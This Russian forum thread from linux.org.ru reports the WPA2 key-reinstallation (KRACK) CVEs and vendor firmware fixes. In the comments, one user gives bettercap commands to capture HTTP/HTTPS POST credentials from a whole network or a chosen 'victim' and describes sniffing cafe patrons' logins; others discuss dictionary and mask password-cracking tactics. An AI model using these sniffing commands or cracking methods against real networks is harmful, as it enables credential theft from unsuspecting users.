LINUX.ORG.RU

Критические уязвимости в протоколе WPA2

 ,


6

4

В протоколе WPA2 (Wi-Fi Protected Access) обнаружены уязвимости, позволяющие прослушивать трафик, передаваемый по беспроводной сети. Злоумышленнику не требуется авторизация, достаточно находиться в зоне устойчивого приёма сигнала.

  • CVE-2017-13077: Reinstallation of the pairwise encryption key (PTK-TK) in the 4-way handshake.
  • CVE-2017-13078: Reinstallation of the group key (GTK) in the 4-way handshake.
  • CVE-2017-13079: Reinstallation of the integrity group key (IGTK) in the 4-way handshake.
  • CVE-2017-13080: Reinstallation of the group key (GTK) in the group key handshake.
  • CVE-2017-13081: Reinstallation of the integrity group key (IGTK) in the group key handshake.
  • CVE-2017-13082: Accepting a retransmitted Fast BSS Transition (FT) Reassociation Request and reinstalling the pairwise encryption key (PTK-TK) while processing it.
  • CVE-2017-13084: Reinstallation of the STK key in the PeerKey handshake.
  • CVE-2017-13086: reinstallation of the Tunneled Direct-Link Setup (TDLS) PeerKey (TPK) key in the TDLS handshake.
  • CVE-2017-13087: reinstallation of the group key (GTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.
  • CVE-2017-13088: reinstallation of the integrity group key (IGTK) when processing a Wireless Network Management (WNM) Sleep Mode Response frame.

Проблема усугубляется тем, что огромное число клиентских устройств, например, с устаревшими версиями iOS и Android (демонстрация атаки на Android) никогда не получат необходимые обновления. Данные, передаваемые такими устройствами будут защищены лишь в том случае, если на точке доступа работает ПО, не подверженное уязвимостям.

Некоторые производители (точно известно об Ubiquiti и Mikrotik) уже выпустили обновлённые прошивки. Уязвимости исправлены в LEDE, но обновлённые прошивки ещё не собраны (последнее обновление — 17.01.3 — вышло 3 октября).

>>> Подробности

anonymous

Проверено: Shaman007 ()
Последнее исправление: cetjs2 (всего исправлений: 5)

есть вообще комбайн bettercap - сбор паролей в http

# sudo apt install build-essential ruby-dev libpcap-dev
# sudo gem install bettercap
# sudo bettercap -XL
# sudo bettercap --proxy -P POST  - пасет всю сеть
# sudo bettercap -T 192.168.x.x --proxy -P POST  - конкретная жертва
можно конечно и https травить
# sudo bettercap --proxy --proxy-https -P POST
# sudo bettercap -T 192.168.x.x --proxy --proxy-https -P POST
но тогда паника поднимится у атакуемых полезут предупреждения безопасности если они у них не отключены

amd_amd ★★★★★
()

все что вам осталось это прийти в интернет кафе, купить кружечку кофе узнать пароль от вафли и начать шмонать всех посетителей кафе при помощи ettercap или bettercap, рано или поздно кто нибудь залогинится через http и ... и обычно люди делают везде одинаковые логин\пароль что бы мозг не лопнул от запоминания, дальше дело техники...

amd_amd ★★★★★
()
Ответ на: комментарий от Shaman007

Вон таки на Хабре пишут, что в случае AES-шифрования в WPA2

https спасает гиганта мысли.

В случае с ethernet можно воткнуться в свитч или в кабель и послушать, там нет шифрования.

Ну это крайний случай, я его не рассматриваю. Так можно у жертвы и терморектальным способом все узнать, не усложняя дело Wi-Fi'ем.

Twissel ★★★★★
()
Ответ на: комментарий от pihter

это был сарказм

А я ждал нормальный ответ

та кто ж те запретит? просто так себе аргументация

На тебе лежит бремя доказательств. man чайник рассела

Ну почему ты считаешь себя умей других я уже спрашивать не буду

У меня нет основания считать каждого встречного умнее себя. Предоставь доказательства и я изменю свою точку зрения.

NextGenenration ★★
()
Ответ на: комментарий от wisedraco

Избыточность человеческой речи очень велика. Говоря по-простому, угадал первые буквы — угадал всю фразу.

AlexM ★★★★★
()

Товарищи знатоки WPA. Поясните пожалуйста каким именно образом переиспользование nonce (в тех случаях когда он не 0) ведет к возможности расшифровки траффика? В сабжевой статье об этом не упоминается. Есть ли практические достижения в этой области?

anonymous
()
Ответ на: комментарий от AlexM

Избыточность человеческой речи очень велика.

ну ок, я только что загадал слово - угадай, какое. даю тебе даже мегаподсказку, которую в реальности тебе никто никогда не даст - слово из 11 букв .... и одной цыфры. сутки тебе на угадывание, время пошло...

wisedraco ★★
()
Ответ на: комментарий от wisedraco

Ох... тот случай, когда наименование не соответствует содержанию.

В (подобранном на помойке) словаре английских слов ≈46K слов длиной 11 символов (встречаются очень странные слова, типа Zulu-kaffir :)). Использование десятичной цифры на произвольной позиции увеличивает количество вариантов в 120 раз. Это, что называется, оценка сверху, для брутфорса.

Если, тем или иным способом, оказывается известной первая буква пароля, то в худшем случае остается проверить 7*120 вариантов, в среднем — 892*120 вариантов. Если известны 2 буквы — что ж, оценка снизу — 120 вариантов (т.е. часть 11-буквенных слов определяется просто по первым двум буквам) при среднем количестве проверок — 90*120.

И это я ещё позволяю цифру в любую позицию пихать. А в постановке задачи-то фигурирует «слово + цифра».

Какгрицца, сравните с ≈100¹² (я оценил в сотню количество символов, вводимых с клавиатуры).

AlexM ★★★★★
()
Последнее исправление: AlexM (всего исправлений: 1)
Ответ на: комментарий от AlexM

да уж, какое умище пропадает. предположим что пароль простой - без смены регистра, без спецзнаков, и даже без цыфр. типа знаменитого стишка «сороктысячьобезьянвжопусунулибанан». допустим даже ( а это нереальный просто подарок), что аж первые три буквы пароля известны. при этом, логично, не известна ни длина пароля, ни что он собой вообще представляет. какова оценочная сложность и временные затраты такое подобрать брутфорсом?

а также составленную пару предложений из произвольного места произвольной книги?

wisedraco ★★
()
Ответ на: комментарий от fornlr

В любой кафешке WiFi он и так открытый

наверно кони все такие ... это все бесполезно, открытый\закрытый это не имеет значения - шмонается траф всех подключеных

amd_amd ★★★★★
()
Ответ на: комментарий от wisedraco

каких масок, каких словарей?

Обычных. Например.
пароль: чудаквасяпупкин
словарь: чудак, идиот, дебил, вася, петя, миша, пупкин.
Подбирают из разных расположений слов, а-ля идиотмишапупких, петядебил, и т.д. Это получается куда быстрее чем посимвольный брутфорс.

anc ★★★★★
()
Ответ на: комментарий от anc

понятно, сэнкс. значит таки надо вводить и какие то необычности в слова в фразы тоже, иначе время перебора и сложность угадывания сильно падают.

wisedraco ★★
()

Робот до сих пор не заштопан. Пора валить на яблоко.

anonymous
()
Ответ на: комментарий от Oberstserj

Я потенциально купил бы истребитель, но денег в моём дырявом кармане хватает только на симулятор.

Deleted
()
Ответ на: комментарий от anc

В ряде случаев посимвольно получается эффективнее.

Deleted
()
Ответ на: комментарий от fornlr

Причем тут эта новость к твоему высказыванию о кафешках?

это высказывание к двум моим высказыванием выше которые в свою очередь относятся к уязвимостям и не только wifi - вся сеть http давно как на ладони и доступно это любому какеру, год назад уже по полной использовал данные уязвимости, естественно действовал по мануалам - которым тоже было не менее года... так что новость как бы с длиннющей бородой...

amd_amd ★★★★★
()

А если протоколы изменить? Или методы шифрования?

citymebe
()
Ответ на: комментарий от wisedraco

Так для сведения. Кстати существуют и региональные словари для вариантов когда слово набирается латиницей, например пупкин gegrby. Пользуют в основном по конкретным регионам. Фраза взятая из языка не «популярном» в данном регионе все-таки снижает вероятность подбора. Снижает но дает «гарантий» :)

anc ★★★★★
()
Ответ на: комментарий от wisedraco

а слово написанные с граммошибками, типа Абизяна ?

Ну настолько детально не всматривался. Думаю если слово популярное (с грам. ошибкой) может и быть включено.

подстановки символов в словах, вместо s $

Вот подобное где-то встречал... s-$, for-4 и т.п.

anc ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.